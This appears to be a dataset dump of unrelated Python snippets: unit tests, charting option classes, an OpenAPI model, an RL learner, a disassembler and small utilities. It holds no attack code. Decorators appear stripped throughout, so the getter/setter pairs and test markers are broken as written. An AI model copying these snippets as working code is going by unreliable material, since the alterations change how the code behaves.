code stringlengths 281 23.7M |
|---|
def test_get_and_putfield():
hdr = bytearray(_segyio.thsize())
with pytest.raises(BufferError):
_segyio.getfield('.', 0)
with pytest.raises(TypeError):
_segyio.getfield([], 0)
with pytest.raises(TypeError):
_segyio.putfield({}, 0, 1)
with pytest.raises(KeyError):
_segyio.getfield(hdr, 0)
with pytest.raises(KeyError):
_segyio.putfield(hdr, 0, 1)
_segyio.putfield(hdr, 1, 127)
_segyio.putfield(hdr, 5, 67)
_segyio.putfield(hdr, 9, 19)
assert (_segyio.getfield(hdr, 1) == 127)
assert (_segyio.getfield(hdr, 5) == 67)
assert (_segyio.getfield(hdr, 9) == 19) |
def board_remove_moderator(board: BoardModel, moderator: ModeratorModel):
with session() as s:
bm = s.query(BoardModeratorOrmModel).filter_by(board_id=board.id, moderator_id=moderator.id).one_or_none()
if (not bm):
raise ArgumentError(MESSAGE_BOARD_NOT_ADDED)
s.delete(bm)
s.commit() |
.parametrize('MeshClass', [UnitIcosahedralSphereMesh, UnitCubedSphereMesh])
def test_helmholtz_mixed_sphere_lowestorder(MeshClass):
errors = [run_helmholtz_mixed_sphere(MeshClass, r, 1, 0) for r in range(2, 5)]
errors = np.asarray(errors)
l2conv = np.log2((errors[:(- 1)] / errors[1:]))
assert (l2conv > 1.7).all() |
class OptionPlotoptionsScatter3dStates(Options):
def hover(self) -> 'OptionPlotoptionsScatter3dStatesHover':
return self._config_sub_data('hover', OptionPlotoptionsScatter3dStatesHover)
def inactive(self) -> 'OptionPlotoptionsScatter3dStatesInactive':
return self._config_sub_data('inactive', OptionPlotoptionsScatter3dStatesInactive)
def normal(self) -> 'OptionPlotoptionsScatter3dStatesNormal':
return self._config_sub_data('normal', OptionPlotoptionsScatter3dStatesNormal)
def select(self) -> 'OptionPlotoptionsScatter3dStatesSelect':
return self._config_sub_data('select', OptionPlotoptionsScatter3dStatesSelect) |
class FaqTypeList(ResourceList):
def query(self, view_kwargs):
query_ = self.session.query(FaqType)
query_ = event_query(query_, view_kwargs)
return query_
view_kwargs = True
methods = ['GET']
schema = FaqTypeSchema
data_layer = {'session': db.session, 'model': FaqType, 'methods': {'query': query}} |
def draw_nodebox(box, name='', properties=None, node_id=None, searched_by=None, style=None):
properties = {k: v for (k, v) in (properties or {}).items() if (not (k.startswith('_') or (k == 'seq')))}
return ['nodebox', box, name, properties, (node_id or []), (searched_by or []), (style or {})] |
def mean_equality_hypothesis_test(sample_mean: torch.Tensor, true_mean: torch.Tensor, true_std: torch.Tensor, sample_size: torch.Tensor, p_value: int):
'Test for the null hypothesis that the mean of a Gaussian\n distribution is within the central 1 - alpha confidence\n interval (CI) for a sample of size sample_size. We also apply an adjustment\n that takes into account that we do the test pointwise independently\n for each element of the tensor. This is basically the Dunn-Sidak\n correction,\n
if (torch.min(sample_size) <= 0):
return False
dimensions = torch.numel(true_mean)
if (dimensions == 0):
return False
if torch.max((true_std <= 0)):
return False
adjusted_p_value = (1 - ((1 - p_value) ** (1.0 / dimensions)))
test_result = (torch.max(((torch.abs((sample_mean - true_mean)) * np.sqrt(sample_size)) / true_std)) <= inverse_normal_cdf((1 - (adjusted_p_value / 2))))
return test_result |
def get_kernel(coordinate_system, field):
kernels = {'cartesian': {'potential': kernel_potential_cartesian, 'g_z': kernel_g_z_cartesian, 'g_northing': kernel_g_northing_cartesian, 'g_easting': kernel_g_easting_cartesian, 'g_ee': kernel_g_ee_cartesian, 'g_nn': kernel_g_nn_cartesian, 'g_zz': kernel_g_zz_cartesian, 'g_en': kernel_g_en_cartesian, 'g_ez': kernel_g_ez_cartesian, 'g_nz': kernel_g_nz_cartesian, 'g_ne': kernel_g_en_cartesian, 'g_ze': kernel_g_ez_cartesian, 'g_zn': kernel_g_nz_cartesian}, 'spherical': {'potential': kernel_potential_spherical, 'g_z': kernel_g_z_spherical, 'g_northing': None, 'g_easting': None}}
if (field not in kernels[coordinate_system]):
raise ValueError("Gravitational field '{}' not recognized".format(field))
kernel = kernels[coordinate_system][field]
if (kernel is None):
raise NotImplementedError
return kernel |
class Immutable(metaclass=ImmutableMeta):
def __new__(*args, **kwargs):
cls = args[0]
(args, kwargs) = cls._canonicalize(*args, **kwargs)
return cls._new(*args[1:], tuple(sorted(kwargs.items())))
def __reduce__(self):
return (self.__class__._new, self._args)
def __hash__(self):
return self._hash
def __eq__(self, other):
return ((self is other) or ((type(self) is type(other)) and (self._args == other._args)))
_property
def __nutils_hash__(self):
h = hashlib.sha1('{}.{}:{}\x00'.format(type(self).__module__, type(self).__qualname__, type(self)._version).encode())
for arg in self._args:
h.update(nutils_hash(arg))
return h.digest()
def __getstate__(self):
raise Exception('getstate should never be called')
def __setstate__(self, state):
raise Exception('setstate should never be called')
def __str__(self):
(*args, kwargs) = self._args
return '{}({})'.format(self.__class__.__name__, ','.join([*map(str, args), *map('{0[0]}={0[1]}'.format, kwargs)])) |
class OptionPlotoptionsTimelineSonificationDefaultspeechoptionsMappingPitch(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get('undefined')
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get('undefined')
def max(self, text: str):
self._config(text, js_type=False)
def min(self):
return self._config_get('undefined')
def min(self, text: str):
self._config(text, js_type=False)
def within(self):
return self._config_get('undefined')
def within(self, text: str):
self._config(text, js_type=False) |
class IntVarSymbolTestCase(unittest.TestCase):
def test_add(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[1, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=37)
imm2 = IntImm(value=41)
var3 = (var1 + var2)
self.assertEqual(var3._attrs['values'], [(1 + 1), (256 + 256)])
self.assertEqual(var3.symbolic_value(), (sym1 + sym2))
var4 = (var1 + imm1)
self.assertEqual(var4._attrs['values'], [(1 + 37), (256 + 37)])
self.assertEqual(var4.symbolic_value(), (sym1 + 37))
imm3 = (imm1 + imm2)
self.assertEqual(imm3._attrs['values'], [(37 + 41)])
self.assertEqual(imm3.symbolic_value(), (37 + 41))
def test_radd(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=37)
var2 = (3 + var1)
self.assertEqual(var2._attrs['values'], [(3 + 1), (3 + 256)])
self.assertEqual(var2.symbolic_value(), (3 + sym1))
imm2 = (7 + imm1)
self.assertEqual(imm2._attrs['values'], [(7 + 37)])
self.assertEqual(imm2.symbolic_value(), (7 + 37))
def test_sub(self):
var1 = IntVar(values=[1, 512], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[1, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=37)
imm2 = IntImm(value=31)
var3 = (var1 - var2)
self.assertEqual(var3._attrs['values'], [0, 511])
self.assertEqual(var3.symbolic_value(), (sym1 - sym2))
var4 = (var1 - imm1)
self.assertEqual(var4._attrs['values'], [0, (512 - 37)])
self.assertEqual(var4.symbolic_value(), (sym1 - 37))
imm3 = (imm1 - imm2)
self.assertEqual(imm3._attrs['values'], [(37 - 31)])
self.assertEqual(imm3.symbolic_value(), (37 - 31))
def test_rsub(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=37)
var2 = (31 - var1)
self.assertEqual(var2._attrs['values'], [0, 30])
self.assertEqual(var2.symbolic_value(), (31 - sym1))
imm2 = (47 - imm1)
self.assertEqual(imm2._attrs['values'], [(47 - 37)])
self.assertEqual(imm2.symbolic_value(), (47 - 37))
def test_mul(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[1, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=37)
imm2 = IntImm(value=41)
var3 = (var1 * var2)
self.assertEqual(var3._attrs['values'], [(1 * 1), (256 * 256)])
self.assertEqual(var3.symbolic_value(), (sym1 * sym2))
var4 = (var1 * imm1)
self.assertEqual(var4._attrs['values'], [(1 * 37), (256 * 37)])
self.assertEqual(var4.symbolic_value(), (sym1 * 37))
imm3 = (imm1 * imm2)
self.assertEqual(imm3._attrs['values'], [(37 * 41)])
self.assertEqual(imm3.symbolic_value(), (37 * 41))
def test_rmul(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=37)
var2 = (3 * var1)
self.assertEqual(var2._attrs['values'], [(3 * 1), (3 * 256)])
self.assertEqual(var2.symbolic_value(), (3 * sym1))
imm2 = (7 * imm1)
self.assertEqual(imm2._attrs['values'], [(7 * 37)])
self.assertEqual(imm2.symbolic_value(), (7 * 37))
def test_div(self):
var1 = IntVar(values=[4, 512], name='var_1')
sym1 = var1.symbolic_value()
var2 = IntVar(values=[2, 256], name='var_2')
sym2 = var2.symbolic_value()
imm1 = IntImm(value=4)
imm2 = IntImm(value=2)
var3 = (var1 / var2)
self.assertEqual(var3._attrs['values'], [0, 256])
self.assertEqual(var3.symbolic_value(), (sym1 / sym2))
var4 = (var1 / imm1)
self.assertEqual(var4._attrs['values'], [1, 128])
self.assertEqual(var4.symbolic_value(), (sym1 / 4))
imm3 = (imm1 / imm2)
self.assertEqual(imm3._attrs['values'], [2])
self.assertEqual(imm3.symbolic_value(), 2)
def test_rdiv(self):
var1 = IntVar(values=[1, 256], name='var_1')
sym1 = var1.symbolic_value()
imm1 = IntImm(value=4)
var2 = (512 / var1)
self.assertEqual(var2._attrs['values'], [2, 512])
self.assertEqual(var2.symbolic_value(), (512 / sym1))
imm2 = (32 / imm1)
self.assertEqual(imm2._attrs['values'], [8])
self.assertEqual(imm2.symbolic_value(), 8) |
class TlsPrivateKeysResponse(ModelComposed):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
lazy_import()
return {'links': (PaginationLinks,), 'meta': (PaginationMeta,), 'data': ([TlsPrivateKeyResponseData],)}
_property
def discriminator():
return None
attribute_map = {'links': 'links', 'meta': 'meta', 'data': 'data'}
read_only_vars = {}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
_property
def _composed_schemas():
lazy_import()
return {'anyOf': [], 'allOf': [Pagination, TlsPrivateKeysResponseAllOf], 'oneOf': []} |
.xfail(strict=True)
.parametrize('dfsr_filename', ['dfsr-depth-dir-down.lis.part', 'dfsr-depth-dir-up.lis.part'])
def test_depth_mode_1_direction_no_match(tmpdir, merge_lis_prs, dfsr_filename):
fpath = os.path.join(str(tmpdir), 'depth-dir-no-data-match.lis')
content = ((headers + [('data/lis/records/curves/' + dfsr_filename), 'data/lis/records/curves/fdata-depth-up-PR1.lis.part', 'data/lis/records/curves/fdata-depth-down-PR2.lis.part', 'data/lis/records/curves/fdata-depth-up-PR3.lis.part']) + trailers)
merge_lis_prs(fpath, content)
with lis.load(fpath) as (f,):
dfs = f.data_format_specs()[0]
with pytest.raises(RuntimeError) as exc:
_ = lis.curves(f, dfs)
assert ("Declared direction doesn't match actual data" in str(exc.value)) |
class OptionPlotoptionsBellcurveDatalabels(Options):
def align(self):
return self._config_get('center')
def align(self, text: str):
self._config(text, js_type=False)
def allowOverlap(self):
return self._config_get(False)
def allowOverlap(self, flag: bool):
self._config(flag, js_type=False)
def animation(self) -> 'OptionPlotoptionsBellcurveDatalabelsAnimation':
return self._config_sub_data('animation', OptionPlotoptionsBellcurveDatalabelsAnimation)
def backgroundColor(self):
return self._config_get(None)
def backgroundColor(self, text: str):
self._config(text, js_type=False)
def borderColor(self):
return self._config_get(None)
def borderColor(self, text: str):
self._config(text, js_type=False)
def borderRadius(self):
return self._config_get(0)
def borderRadius(self, num: float):
self._config(num, js_type=False)
def borderWidth(self):
return self._config_get(0)
def borderWidth(self, num: float):
self._config(num, js_type=False)
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def crop(self):
return self._config_get(True)
def crop(self, flag: bool):
self._config(flag, js_type=False)
def defer(self):
return self._config_get(True)
def defer(self, flag: bool):
self._config(flag, js_type=False)
def enabled(self):
return self._config_get(False)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def filter(self) -> 'OptionPlotoptionsBellcurveDatalabelsFilter':
return self._config_sub_data('filter', OptionPlotoptionsBellcurveDatalabelsFilter)
def format(self):
return self._config_get('point.value')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get(None)
def formatter(self, value: Any):
self._config(value, js_type=False)
def inside(self):
return self._config_get(None)
def inside(self, flag: bool):
self._config(flag, js_type=False)
def nullFormat(self):
return self._config_get(None)
def nullFormat(self, flag: bool):
self._config(flag, js_type=False)
def nullFormatter(self):
return self._config_get(None)
def nullFormatter(self, value: Any):
self._config(value, js_type=False)
def overflow(self):
return self._config_get('justify')
def overflow(self, text: str):
self._config(text, js_type=False)
def padding(self):
return self._config_get(5)
def padding(self, num: float):
self._config(num, js_type=False)
def position(self):
return self._config_get('center')
def position(self, text: str):
self._config(text, js_type=False)
def rotation(self):
return self._config_get(0)
def rotation(self, num: float):
self._config(num, js_type=False)
def shadow(self):
return self._config_get(False)
def shadow(self, flag: bool):
self._config(flag, js_type=False)
def shape(self):
return self._config_get('square')
def shape(self, text: str):
self._config(text, js_type=False)
def style(self):
return self._config_get(None)
def style(self, value: Any):
self._config(value, js_type=False)
def textPath(self) -> 'OptionPlotoptionsBellcurveDatalabelsTextpath':
return self._config_sub_data('textPath', OptionPlotoptionsBellcurveDatalabelsTextpath)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False)
def verticalAlign(self):
return self._config_get('bottom')
def verticalAlign(self, text: str):
self._config(text, js_type=False)
def x(self):
return self._config_get(0)
def x(self, num: float):
self._config(num, js_type=False)
def y(self):
return self._config_get(0)
def y(self, num: float):
self._config(num, js_type=False)
def zIndex(self):
return self._config_get(6)
def zIndex(self, num: float):
self._config(num, js_type=False) |
class Validators(Enums):
def required(self):
self._add_value()
return self
def unique(self):
self._add_value()
return self
def integer(self):
self._add_value()
return self
def float(self):
self._add_value()
return self
def numeric(self):
self._add_value()
return self
def min(self, val):
self._add_value(value=('min:%s' % val))
return self
def max(self, val):
self._add_value(value=('max:%s' % val))
return self
def maxLength(self, val):
self._add_value(value=('maxLength:%s' % val))
return self
def list(self, vals: list):
self._add_value(value=('in:%s' % ''.join(map((lambda x: str(x)), vals))))
return self
def regex(self, val: str):
self._add_value(value=('regex:%s' % val))
return self |
class AccessTokenDatabase(Protocol, Generic[AP]):
async def get_by_token(self, token: str, max_age: Optional[datetime]=None) -> Optional[AP]:
...
async def create(self, create_dict: Dict[(str, Any)]) -> AP:
...
async def update(self, access_token: AP, update_dict: Dict[(str, Any)]) -> AP:
...
async def delete(self, access_token: AP) -> None:
... |
def fortios_log_syslogd3(data, fos):
fos.do_member_operation('log.syslogd3', 'setting')
if data['log_syslogd3_setting']:
resp = log_syslogd3_setting(data, fos)
else:
fos._module.fail_json(msg=('missing task body: %s' % 'log_syslogd3_setting'))
return ((not is_successful_status(resp)), (is_successful_status(resp) and (resp['revision_changed'] if ('revision_changed' in resp) else True)), resp, {}) |
class OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMapping(Options):
def pitch(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPitch':
return self._config_sub_data('pitch', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPitch)
def playDelay(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPlaydelay':
return self._config_sub_data('playDelay', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingPlaydelay)
def rate(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingRate':
return self._config_sub_data('rate', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingRate)
def text(self):
return self._config_get(None)
def text(self, text: str):
self._config(text, js_type=False)
def time(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingTime':
return self._config_sub_data('time', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingTime)
def volume(self) -> 'OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingVolume':
return self._config_sub_data('volume', OptionPlotoptionsSolidgaugeSonificationDefaultspeechoptionsMappingVolume) |
class ManageCasesTool(Tool):
def __init__(self, config: ErtConfig, notifier, ensemble_size: int):
self.notifier = notifier
self.ert_config = config
self.ensemble_size = ensemble_size
super().__init__('Manage cases', QIcon('img:build_wrench.svg'))
def trigger(self):
case_management_widget = CaseInitializationConfigurationPanel(self.ert_config, self.notifier, self.ensemble_size)
dialog = ClosableDialog('Manage cases', case_management_widget, self.parent())
dialog.setObjectName('manage-cases')
dialog.exec_() |
def disassemble(reader, data_offset_begin, data_offset_end, data_begin, data_end, code_begin, code_end):
length = file_size(reader)
call0 = {}
data_pointers = {}
code_pointers = {}
while (reader.tell() < length):
address = reader.tell()
if (data_offset_begin <= address < data_offset_end):
disassemble_data(reader, address, data_begin, data_end, code_begin, code_end, data_pointers, code_pointers)
else:
data = reader.read(1)
if (len(data) != 1):
LOGGER.debug('Failed to read 1 bytes at address 0x%x.', address)
continue
lower_8 = data[0]
if ((lower_8 & 63) == 5):
disassemble_call0(reader, address, call0)
elif (lower_8 == 102):
disassemble_bnei(reader, address, lower_8)
elif ((lower_8 & 15) == 1):
reader.read(2)
elif ((lower_8 & 15) == 4):
reader.read(1)
return (call0, data_pointers, code_pointers) |
class DrQV2Learner(core.Learner):
def __init__(self, random_key: jax_types.PRNGKey, dataset: Iterator[reverb.ReplaySample], networks: drq_v2_networks.DrQV2Networks, sigma_schedule: optax.Schedule, augmentation: augmentations.DataAugmentation, policy_optimizer: optax.GradientTransformation, critic_optimizer: optax.GradientTransformation, encoder_optimizer: optax.GradientTransformation, noise_clip: float=0.3, critic_soft_update_rate: float=0.005, discount: float=0.99, counter: Optional[counting.Counter]=None, logger: Optional[loggers.Logger]=None):
def critic_loss_fn(critic_params: networks_lib.Params, encoder_params: networks_lib.Params, critic_target_params: networks_lib.Params, policy_params: networks_lib.Params, transitions: acme_types.Transition, key: jax_types.PRNGKey, sigma: jnp.ndarray):
next_encoded = networks.encoder_network.apply(encoder_params, transitions.next_observation)
next_action = networks.policy_network.apply(policy_params, next_encoded)
next_action = networks.add_policy_noise(next_action, key, sigma, noise_clip)
(next_q1, next_q2) = networks.critic_network.apply(critic_target_params, next_encoded, next_action)
next_q = jnp.minimum(next_q1, next_q2)
target_q = (transitions.reward + ((transitions.discount * discount) * next_q))
target_q = jax.lax.stop_gradient(target_q)
encoded = networks.encoder_network.apply(encoder_params, transitions.observation)
(q1, q2) = networks.critic_network.apply(critic_params, encoded, transitions.action)
loss_critic = (jnp.square((target_q - q1)) + jnp.square((target_q - q2))).mean(axis=0)
return (loss_critic, {'q1': q1.mean(), 'q2': q2.mean()})
def policy_loss_fn(policy_params: networks_lib.Params, critic_params: networks_lib.Params, encoder_params: networks_lib.Params, observation: acme_types.Transition, sigma: jnp.ndarray, key):
encoded = networks.encoder_network.apply(encoder_params, observation)
action = networks.policy_network.apply(policy_params, encoded)
action = networks.add_policy_noise(action, key, sigma, noise_clip)
(q1, q2) = networks.critic_network.apply(critic_params, encoded, action)
q = jnp.minimum(q1, q2)
policy_loss = (- q.mean())
return (policy_loss, {})
policy_grad_fn = jax.value_and_grad(policy_loss_fn, has_aux=True)
critic_grad_fn = jax.value_and_grad(critic_loss_fn, argnums=(0, 1), has_aux=True)
def update_step(state: TrainingState, transitions: acme_types.Transition):
(key_aug1, key_aug2, key_policy, key_critic, key) = jax.random.split(state.key, 5)
sigma = sigma_schedule(state.steps)
observation_aug = augmentation(key_aug1, transitions.observation)
next_observation_aug = augmentation(key_aug2, transitions.next_observation)
transitions = transitions._replace(observation=observation_aug, next_observation=next_observation_aug)
((critic_loss, critic_aux), (critic_grad, encoder_grad)) = critic_grad_fn(state.critic_params, state.encoder_params, state.critic_target_params, state.policy_params, transitions, key_critic, sigma)
(encoder_update, encoder_opt_state) = encoder_optimizer.update(encoder_grad, state.encoder_opt_state)
(critic_update, critic_opt_state) = critic_optimizer.update(critic_grad, state.critic_opt_state)
encoder_params = optax.apply_updates(state.encoder_params, encoder_update)
critic_params = optax.apply_updates(state.critic_params, critic_update)
((policy_loss, policy_aux), actor_grad) = policy_grad_fn(state.policy_params, critic_params, encoder_params, observation_aug, sigma, key_policy)
(policy_update, policy_opt_state) = policy_optimizer.update(actor_grad, state.policy_opt_state)
policy_params = optax.apply_updates(state.policy_params, policy_update)
polyak_update_fn = partial(_soft_update, tau=critic_soft_update_rate)
critic_target_params = polyak_update_fn(state.critic_target_params, critic_params)
metrics = {'policy_loss': policy_loss, 'critic_loss': critic_loss, 'sigma': sigma, **critic_aux, **policy_aux}
new_state = TrainingState(policy_params=policy_params, policy_opt_state=policy_opt_state, encoder_params=encoder_params, encoder_opt_state=encoder_opt_state, critic_params=critic_params, critic_target_params=critic_target_params, critic_opt_state=critic_opt_state, key=key, steps=(state.steps + 1))
return (new_state, metrics)
self._iterator = dataset
self._counter = (counter or counting.Counter())
self._logger = (logger or loggers.make_default_logger(label='learner', save_data=False, asynchronous=True, serialize_fn=utils.fetch_devicearray))
self._update_step = jax.jit(update_step)
def make_initial_state(key: jax_types.PRNGKey):
(key_encoder, key_critic, key_policy, key) = jax.random.split(key, 4)
encoder_init_params = networks.encoder_network.init(key_encoder)
encoder_init_opt_state = encoder_optimizer.init(encoder_init_params)
critic_init_params = networks.critic_network.init(key_critic)
critic_init_opt_state = critic_optimizer.init(critic_init_params)
policy_init_params = networks.policy_network.init(key_policy)
policy_init_opt_state = policy_optimizer.init(policy_init_params)
return TrainingState(policy_params=policy_init_params, policy_opt_state=policy_init_opt_state, encoder_params=encoder_init_params, critic_params=critic_init_params, critic_target_params=critic_init_params, encoder_opt_state=encoder_init_opt_state, critic_opt_state=critic_init_opt_state, key=key, steps=0)
self._state = make_initial_state(random_key)
self._timestamp = None
def step(self):
sample = next(self._iterator)
transitions: acme_types.Transition = sample.data
(self._state, metrics) = self._update_step(self._state, transitions)
timestamp = time.time()
elapsed_time = ((timestamp - self._timestamp) if self._timestamp else 0)
self._timestamp = timestamp
counts = self._counter.increment(steps=1, walltime=elapsed_time)
self._logger.write({**metrics, **counts})
def get_variables(self, names):
variables = {'policy': {'encoder': self._state.encoder_params, 'policy': self._state.policy_params}}
return [variables[name] for name in names]
def save(self) -> TrainingState:
return self._state
def restore(self, state: TrainingState) -> None:
self._state = state |
def connect_fragments_ahlrichs(cdm, fragments, atoms, min_dist_scale=1.1, scale=1.2, avoid_h=False, logger=None):
atoms = [atom.lower() for atom in atoms]
if (len(fragments) > 1):
log(logger, f'Detected {len(fragments)} fragments. Generating interfragment bonds.')
dist_mat = squareform(cdm)
frag_pairs = list()
interfrag_inds = list()
max_dist = (3.0 / BOHR2ANG)
all_fragment_inds = [i for (i, _) in enumerate(fragments)]
unconnected_fragment_inds = all_fragment_inds.copy()[1:]
h_inds = set([i for (i, atom) in enumerate(atoms) if (atom.lower() == 'h')])
while True:
for (i, j) in it.product(all_fragment_inds, unconnected_fragment_inds):
if (i >= j):
continue
frag1 = fragments[i]
frag2 = fragments[j]
log(logger, f' Connecting {len(frag1)}-atom and {len(frag2)}-atom fragments.')
inds = np.array([(i1, i2) for (i1, i2) in it.product(frag1, frag2)], dtype=int)
distances = np.array([dist_mat[(k, l)] for (k, l) in inds])
frag_pairs.append((i, j))
min_ind = distances.argmin()
min_dist = distances[min_ind]
if avoid_h:
sort_inds = np.argsort(distances, kind='stable')
for (k, dist) in zip(sort_inds, distances[sort_inds]):
if (set(inds[k]) & h_inds):
continue
if (dist >= (1.5 * min_dist)):
break
min_ind = k
min_dist = distances[k]
break
if (min_dist <= max_dist):
offset = min(((min_dist_scale - 1.0) * min_dist), (1.0 / BOHR2ANG))
mask = (distances <= (min_dist + offset))
interfrag_inds.extend(inds[mask])
unconnected_fragment_inds = [k for k in unconnected_fragment_inds if (k not in (i, j))]
if (len(unconnected_fragment_inds) == 0):
break
max_dist *= scale
interfrag_inds = np.array(interfrag_inds, dtype=int)
return (interfrag_inds, list()) |
def extractAnonanemoneWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('tmpw', "The Man's Perfect Wife", 'translated'), ('DS', 'Doppio Senso', 'translated'), ('loy', 'Lady of YeonSung', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class TimeMap():
def __init__(self):
self.track = {}
def set(self, key: str, value: str, timestamp: int) -> None:
if (key not in self.track):
self.track[key] = []
self.track[key].append((timestamp, value))
def get(self, key: str, timestamp: int) -> str:
if (key not in self.track):
return ''
values = self.track[key]
(start, end) = (0, (len(values) - 1))
while (start < end):
if (start == (end - 1)):
if (values[end][0] <= timestamp):
return values[end][1]
elif (values[start][0] <= timestamp):
return values[start][1]
else:
return ''
mid = ((start + end) // 2)
if (values[mid][0] == timestamp):
return values[mid][1]
elif (values[mid][0] > timestamp):
end = (mid - 1)
else:
start = mid
print(values, start, end)
if ((start < len(values)) and (values[start][0] <= timestamp)):
return values[start][1]
elif (values[end][0] <= timestamp):
return values[end][1]
return '' |
class ImportWorkerManager(WorkerManager):
worker_prefix = 'import_worker'
def start_task(self, worker_id, task):
command = ['copr-distgit-process-import', '--daemon', '--build-id', str(task.build_id), '--worker-id', worker_id]
self.log.info('running worker: %s', ' '.join(command))
self.start_daemon_on_background(command)
def finish_task(self, worker_id, task_info):
self.get_task_id_from_worker_id(worker_id)
return True |
def test_find_peaks_raises_exception_with_min_peak_height_not_being_int_type():
data = np.random.randint(0, 10, 100)
with pytest.raises(TypeError):
scared.signal_processing.find_peaks(data, 1, 'foo')
with pytest.raises(TypeError):
scared.signal_processing.find_peaks(data, 1, None)
with pytest.raises(TypeError):
scared.signal_processing.find_peaks(data, 1, {'foo': 'bar'}) |
class ValveLogger():
def __init__(self, logger, dp_id, dp_name):
self.logger = logger
self.dp_id = dp_id
self.dp_name = dp_name
def _dpid_prefix(self, log_msg):
return ' '.join((valve_util.dpid_log(self.dp_id), self.dp_name, log_msg))
def debug(self, log_msg):
self.logger.debug(self._dpid_prefix(log_msg))
def info(self, log_msg):
self.logger.info(self._dpid_prefix(log_msg))
def error(self, log_msg):
self.logger.error(self._dpid_prefix(log_msg))
def warning(self, log_msg):
self.logger.warning(self._dpid_prefix(log_msg)) |
class AIWrapper():
cache_path_root: str = '.cache'
